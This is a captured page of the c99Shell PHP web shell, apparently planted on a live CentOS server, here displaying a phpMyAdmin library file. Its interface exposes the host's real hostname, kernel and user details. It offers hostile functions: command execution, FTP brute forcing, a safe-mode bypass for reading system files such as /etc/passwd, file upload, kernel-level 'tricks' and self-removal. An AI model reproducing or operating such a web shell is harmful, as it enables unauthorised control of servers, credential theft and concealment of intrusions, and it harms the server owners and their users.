!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     user_preferences.lib.php (10.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
resetConfigData(); // start with a clean instance
    $cf->setAllowedKeys($forms_all_keys);
    $cf->setCfgUpdateReadMapping(array(
        'Server/hide_db' => 'Servers/1/hide_db',
        'Server/only_db' => 'Servers/1/only_db'));
    $cf->updateWithGlobalConfig($GLOBALS['cfg']);
}

/**
 * Loads user preferences
 *
 * Returns an array:
 * * config_data - path => value pairs
 * * mtime - last modification time
 * * type - 'db' (config read from pmadb) or 'session' (read from user session)
 *
 * @uses $_SESSION['userconfig']
 * @uses $GLOBALS['controllink']
 * @uses PMA_array_merge_recursive
 * @uses PMA_backquote()
 * @uses PMA_DBI_fetch_single_row()
 * @uses PMA_getRelationsParam()
 * @uses PMA_sqlAddslashes()
 * @uses $GLOBALS['controllink']
 * @return array
 */
function PMA_load_userprefs()
{
    $cfgRelation = PMA_getRelationsParam();
    if (!$cfgRelation['userconfigwork']) {
        // no pmadb table, use session storage
        if (!isset($_SESSION['userconfig'])) {
            $_SESSION['userconfig'] = array(
                'db' => array(),
                'ts' => time());
        }
        return array(
            'config_data' => $_SESSION['userconfig']['db'],
            'mtime' => $_SESSION['userconfig']['ts'],
            'type' => 'session');
    }
    // load configuration from pmadb
    $query_table = PMA_backquote($cfgRelation['db']) . '.' . PMA_backquote($cfgRelation['userconfig']);
    $query = '
        SELECT `config_data`, UNIX_TIMESTAMP(`timevalue`) ts
        FROM ' . $query_table . '
          WHERE `username` = \'' . PMA_sqlAddslashes($cfgRelation['user']) . '\'';
    $row = PMA_DBI_fetch_single_row($query, 'ASSOC', $GLOBALS['controllink']);

    return array(
        'config_data' => $row ? (array)json_decode($row['config_data']) : array(),
        'mtime' => $row ? $row['ts'] : time(),
        'type' => 'db');
}

/**
 * Saves user preferences
 *
 * @uses $_SESSION['cache'][...]['userprefs']
 * @uses $_SESSION['userconfig']
 * @uses $GLOBALS['cfg']['ServerDefault']
 * @uses $GLOBALS['controllink']
 * @uses $GLOBALS['server']
 * @uses ConfigFile::getConfigArray()
 * @uses ConfigFile::getInstance()
 * @uses PMA_backquote()
 * @uses PMA_DBI_fetch_value
 * @uses PMA_DBI_getError()
 * @uses PMA_DBI_try_query()
 * @uses PMA_Message::addMessage()
 * @uses PMA_Message::error()
 * @uses PMA_Message::rawError()
 * @uses PMA_sqlAddslashes()
 * @uses PMA_getRelationsParam()
 * @param array $config_data
 * @return true
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--